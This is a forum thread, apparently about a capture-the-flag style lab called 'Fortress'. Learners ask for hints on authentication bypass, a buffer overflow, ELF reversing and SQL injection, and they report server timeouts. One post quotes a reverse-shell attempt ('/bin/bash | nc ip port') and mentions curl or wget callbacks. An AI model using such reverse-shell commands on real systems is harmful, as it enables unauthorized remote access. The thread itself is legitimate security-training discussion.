[JET] Fortress

going deeper clue

Thanks to @sh4d0wless for PM me :slight_smile:

anyone can help me for overflown question?
i cant get success with my exploit on local :confused: (note: im beginner on pwn and re)
i can send my exploit on discord, sh4d0wless#6154

I stuck with bypass authentication, I tried many attempts to bypass but couldn’t get through.

Could you anyone ping me please.

I stuck with memo.
—Honestly with pwntools in this case.
I tried use pwntools, tried wroite simple script for creating note but after “Are you done? [yes/no]” I give “Which part of [yes/no] did you not understand?%” and can’t respond anything.
Cat somebody give hint how use pwntools in cases like this?—

UPD. It’s strange but after reinstall it started to work… but anyway strange

F**k, the box is floundering… admin page not available for flag #6… ? “504 Gateway Time-out”

Again:

???

504 Gateway Time-out
nginx/1.10.3 (Ubuntu)

Someone can help me to catch the 6th flag?.. I’m searching a good documentation to repair the “leak” :wink: Reversing an ELF is not my force at all… Thanks!

Type your comment> @choupit0 said:

F**k, the box is floundering… admin page not available for flag #6… ? “504 Gateway Time-out”

Again:

???

504 Gateway Time-out
nginx/1.10.3 (Ubuntu)

Hi, you’d better script the login and reverse shell process to make it work anytime :wink:

Type your comment> @daemonzone said:

Type your comment> @choupit0 said:

F**k, the box is floundering… admin page not available for flag #6… ? “504 Gateway Time-out”

Again:

???

504 Gateway Time-out
nginx/1.10.3 (Ubuntu)

Hi, you’d better script the login and reverse shell process to make it work anytime :wink:

Yes, this is what I am doing :wink: but sometimes I get this error.

And do you have a good article about 6th flag?..

And do you have a good article about 6th flag?..

Maybe A journey into Radare 2 – Part 2: Exploitation – Megabeets

Type your comment> @fr0ster said:

(Quote)
Maybe A journey into Radare 2 – Part 2: Exploitation – Megabeets

Thank you @fr0ster very interesting and detailed.

Hello guys!
I’m able to make command execution, also I can to make simple TCP connect using “nc ip port”, but I can’t to get a reverse shell. I have tried every payload from pentest monkeys. Also I have tried to make curl or wget to my machine, but connection didn’t come to my machine and I see 302 code.
Could someone help me with this issue?
The only payload with some progress is “/bin/bash | nc ip port”, but shell dropping immidiately after connection

hi guy been stuck at Secret Message part now for few days need little hint please
thanks

I’m stuck with digging, each time I try to dig i get connection timed out, is this normal ?
and can someone help me getting over this? :\

I’m stuck on Elasticity…I try a lot of think but nothing dedicated port seems to be not so “responsive”…can anyone give me a suggestion ?

Can someone pm for a quick question about overflow?

Sq**ap is not finding any injection vulns in mysql. Probably something wrong with my config.

Cannot access the initial login page, am i the only one?

Seems like all other “files” can load but get 504 on the login page and the “command” area

Anyone else doing this fortress these days?